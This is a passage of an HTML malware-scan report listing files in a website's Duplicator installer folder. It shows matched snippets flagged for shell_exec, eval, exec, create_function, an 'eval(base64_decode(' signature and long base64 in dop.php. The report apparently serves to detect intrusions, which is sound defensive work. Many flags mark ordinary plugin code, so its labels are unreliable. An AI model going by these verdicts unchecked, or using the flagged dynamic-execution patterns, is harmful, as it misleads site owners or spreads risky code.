#DD0000">'from'</span><span style="color: #007700">])||&nbsp;empty(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'fromName'</span><span style="color: #007700">]...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_7").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/dup-installer/ctrls/ctrl.s1.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.32 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:07</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_8" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$command</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">!=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$zip_err_msg&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">ERR_SHELLEXEC_ZIPOPEN</span><span style="color: #007700">.</span><span style="color: #DD0000">":&nbsp;</span><span style="color: #0000BB">$stderr</span><span style="color: #DD0000">"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$zip_err_msg&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #DD0000">"&lt;br/&gt;&lt;br/&gt;&lt;b&gt;To&nbsp;resolve&nbsp;error&nbsp;see&nbsp;&lt;a&nbsp;href='https://snapcreek.com/duplicator/docs/faqs-tech/#faq-installer-130-q'&nbsp;target='_blank'&gt;https://snapcreek.com/duplicator/docs/faqs-tech/#faq-installer-130-q&lt;/a&gt;&lt;/b&gt;"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">error</span><span style="color: #007700">(</span><span style="color: #0000BB">$zip_err_msg</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">info</span><span style="color: #007700">(</span><span style="color: #DD0000">"&lt;&lt;&lt;&nbsp;Shell-Exec&nbsp;Unzip&nbsp;Complete."</span><span style="color: #007700">);&nbsp;break;&nbsp;case&nbsp;</span><span style="color: #DD0000">'ziparchive'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">info</span><span style="color: #007700">(</span><span style="color: #DD0000">"\n\nSTART&nbsp;ZIP&nbsp;FILE&nbsp;EXTRACTION&nbsp;STANDARD&nbsp;&gt;&gt;&gt;&nbsp;"</span><span style="color: #007700">);&nbsp;if&nbsp;(!class...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">SUHOSIN</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_8").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/dup-installer/views/view.s1.base.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 59.74 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:07</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_9" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Suhosin</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_9").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/dup-installer/assets/inc.libs.js.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 527.37 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:07</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_10" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #DD0000">'('</span><span style="color: #007700">+</span><span style="color: #0000BB">text</span><span style="color: #007700">+</span><span style="color: #DD0000">')'</span><span style="color: #007700">);return&nbsp;</span><span style="color: #0000BB">typeof&nbsp;filter</span><span style="color: #007700">===</span><span style="color: #DD0000">'function'</span><span style="color: #007700">?</span><span style="color: #0000BB">walk</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">,</span><span style="color: #0000BB">j</span><span style="color: #007700">):</span><span style="color: #0000BB">j</span><span style="color: #007700">;}<br />throw&nbsp;new&nbsp;</span><span style="color: #0000BB">SyntaxError</span><span style="color: #007700">(</span><span style="color: #DD0000">'parseJSON'</span><span style="color: #007700">);}};}();}<br />&lt;/</span><span style="color: #0000BB">script</span><span style="color: #007700">&gt;<br /><br />&lt;</span><span style="color: #0000BB">script</span><span style="color: #007700">&gt;<br /></span><span style="color: #FF8000">/**<br />&nbsp;*&nbsp;password_strength_plugin.js<br />&nbsp;*&nbsp;Copyright&nbsp;(c)&nbsp;20010&nbsp;myPocket&nbsp;technologies&nbsp;(www.mypocket-technologies.com)<br />&nbsp;*&nbsp;@author&nbsp;Darren&nbsp;Mason&nbsp;(djmason9@gmail.com)<br />&nbsp;*&nbsp;@date&nbsp;3/13/2009<br />&nbsp;*&nbsp;@projectDescription&nbsp;Password&nbsp;Strength&nbsp;Meter&nbsp;is&nbsp;a&nbsp;jQuery&nbsp;plug-in&nbsp;provide&nbsp;you&nbsp;smart&nbsp;algorithm&nbsp;to&nbsp;detect&nbsp;a&nbsp;password&nbsp;strength.&nbsp;<br />&nbsp;*&nbsp;Based&nbsp;on&nbsp;Firas&nbsp;Kassem&nbsp;orginal&nbsp;plugin&nbsp;-&nbsp;phiras.wordpress.com/20...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">)))if(</span><span style="color: #0000BB">j</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]){if(</span><span style="color: #0000BB">9</span><span style="color: #007700">===</span><span style="color: #0000BB">k</span><span style="color: #007700">){if(</span><span style="color: #0000BB">h</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">),!</span><span style="color: #0000BB">h</span><span style="color: #007700">||!</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">parentNode</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">;if(</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">id</span><span style="color: #007700">===</span><span style="color: #0000BB">j</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">.</span><span style="color: #0000BB">push</span><span style="color: #007700">(</span><span style="color: #0000BB">h</span><span style="color: #007700">),</span><span style="color: #0000BB">d</span><span style="color: #007700">}else&nbsp;if(</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">ownerDocument</span><span style="color: #007700">&amp;&amp;(</span><span style="color: #0000BB">h</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">ownerDocument</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">))&amp;&amp;</span><span style="color: #0000BB">t</span><span style="color: #007700">(</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">h</span><span style="color: #007700">)&amp;&amp;</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">id</span><span style="color: #007700">===</span><span style="color: #0000BB">j</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">.</span><span style="color: #0000BB">push</span><span style="color: #007700">(</span><span style="color: #0000BB">h</span><span style="color: #007700">),</span><span style="color: #0000BB">d</span><span style="color: #007700">}else{if(</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">])return&nbsp;</span><span style="color: #0000BB">H</span><span style="color: #007700">.</span><span style="color: #0000BB">apply</span><span style="color: #007700">(</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByTagName</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">)),</span><span style="color: #0000BB">d</span><span style="color: #007700">;if((</span><span style="color: #0000BB">j</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">])&amp;&amp;</span><span style="color: #0000BB">c</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByClassName</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">H</span><span style="color: #007700">.</span><span style="color: #0000BB">apply</span><span style="color: #007700">(</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByClassName</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">)),</span><span style="color: #0000BB">d</span><span style="color: #007700">}if(</span><span style="color: #0000BB">c</span><span style="color: #007700">.</span><span style="color: #0000BB">qsa</span><span style="color: #007700">&amp;&amp;(!</span><span style="color: #0000BB">q</span><span style="color: #007700">||!</span><span style="color: #0000BB">q</span><span style="color: #007700">.</span><span style="color: #0000BB">test</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">))){if(</span><span style="color: #0000BB">s</span><span style="color: #007700">=</span><span style="color: #0000BB">r</span><span style="color: #007700">=</span><span style="color: #0000BB">u</span><span style="color: #007700">,</span><span style="color: #0000BB">w</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">x</span><span style="color: #007700">=</span><span style="color: #0000BB">1</span><span style="color: #007700">!==</span><span style="color: #0000BB">k</span><span style="color: #007700">&amp;&amp;</span><span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">1</span><span style="color: #007700">===</span><span style="color: #0000BB">k</span><span style="color: #007700">&amp;&amp;</span><span style="color: #DD0000">"object"</span><span style="color: #007700">!==</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">nodeName</span><span style="color: #007700">.</span><span style="color: #0000BB">toLowerCase</span><span style="color: #007700">()){</span><span style="color: #0000BB">o</span><span style="color: #007700">=</span><span style="color: #0000BB">g</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">),(</span><span style="color: #0000BB">r</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">"id"</span><span style="color: #007700">))?</span><span style="color: #0000BB">s</span><span style="color: #007700">=</span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">replace</span><span style="color: #007700">(</span><span style="color: #0000BB">bb</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">c</span><span style="color: #007700">,</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">e</span><span style="color: #007700">,</span><span style="color: #0000BB">f</span><span style="color: #007700">,</span><span style="color: #0000BB">g</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_10").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/dup-installer/classes/class.server.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.32 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:07</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_11" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'echo&nbsp;duplicator'</span><span style="color: #007700">))&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">get_unzip_filepath</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">null</span><span style="color: #007700">;&nbsp;if&nbsp;(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">is_shell_exec_available</span><span style="color: #007700">())&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'hash&nbsp;unzip&nbsp;2&gt;&amp;1'</span><span style="color: #007700">)&nbsp;==&nbsp;</span><span style="color: #0000BB">NULL</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'unzip'</span><span style="color: #007700">;&nbsp;}&nbsp;else&nbsp;{&nbsp;</span><span style="color: #0000BB">$possible_paths&nbsp;</span><span style="color: #007700">=&nbsp;array(</span><span style="color: #DD0000">'/usr/bin/unzip'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'/opt/local/bin/unzip'</span><span style="color: #007700">);&nbsp;foreach&nbsp;(</span><span style="color: #0000BB">$possible_paths&nbsp;</span><span style="color: #007700">as&nbsp;</span><span style="color: #0000BB">$path</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">file_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$path</span><span style="color: #007700">;&nbsp;break;&nbsp;}&nbsp;}&nbsp;}&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">$filepath</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">isWordPress</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$search_list&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">explode</span><span style="color: #007700">(</span><span style="color: #DD0000">','</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$wpCo</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 74</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_11").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/dup-installer/classes/Crypt/Base.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 98.92 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:07</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_12" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit php_uname <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2631</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">(</span><span style="color: #DD0000">'m'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$_action,&nbsp;&amp;$self,&nbsp;$_text'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$init_crypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'if&nbsp;($_action&nbsp;==&nbsp;"encrypt")&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$encrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;else&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$decrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}'</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;&amp;</span><span style="color: #0000BB">_getLambdaFunctions</span><span style="color: #007700">()&nbsp;{&nbsp;static&nbsp;</span><span style="color: #0000BB">$functions&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;return&nbsp;</span><span style="color: #0000BB">$functions</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">_hashInlineCryptFunction</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(!</span><span style="color: #0000BB">defined</span><span style="color: #007700">(</span><span style="color: #DD0000">'CRYPT_BASE_WHIRLPOOL_AVAILABLE'</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">define</span><span style="color: #007700">(</span><span style="color: #DD0000">'CRYPT_BASE_WHIRLPOOL_AVAILABLE'</span><span style="color: #007700">,&nbsp;(bool)(</span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'hash'</span><span style="color: #007700">)&nbsp;&amp;&amp;&nbsp;</span><span style="color: #0000BB">in_array</span><span style="color: #007700">(</span><span style="color: #DD0000">'whirlpool'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">hash_algos</span><span style="color: #007700">())));&nbsp;}&nbsp;</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$hash&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">;&nbsp;switch&nbsp;(</span><span style="color: #0000BB">true</span><span style="color: #007700">)&nbsp;{&nbsp;case&nbsp;</span><span style="color: #0000BB">CRYPT_BASE_WHIRL</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #DD0000">'$func&nbsp;=&nbsp;function&nbsp;($_action,&nbsp;&amp;$self,&nbsp;$_text)&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$init_crypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'if&nbsp;($_action&nbsp;==&nbsp;"encrypt")&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$encrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;else&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$decrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;};'</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$func</span><span style="color: #007700">;&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$_action,&nbsp;&amp;$self,&nbsp;$_text'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$init_crypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'if&nbsp;($_action&nbsp;==&nbsp;"encrypt")&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$encrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;else&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$decrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}'</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;&amp;</span><span style="color: #0000BB">_getLambdaFunctions</span><span style="color: #007700">()&nbsp;{&nbsp;static&nbsp;</span><span style="color: #0000BB">$functions&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;return&nbsp;</span><span style="color: #0000BB">$functions</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">_hashInlineCryptFunction</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(!</span><span style="color: #0000BB">defined</span><span style="color: #007700">(</span><span style="color: #DD0000">'CRYPT_BASE_WHIRLPOOL_AVAILABLE'</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">define</span><span style="color: #007700">(</span><span style="color: #DD0000">'CR...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_12").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/dup-installer/classes/config/class.constants.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.53 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:07</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_13" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_13").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/dop.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.13 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:47</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 4</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_14" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
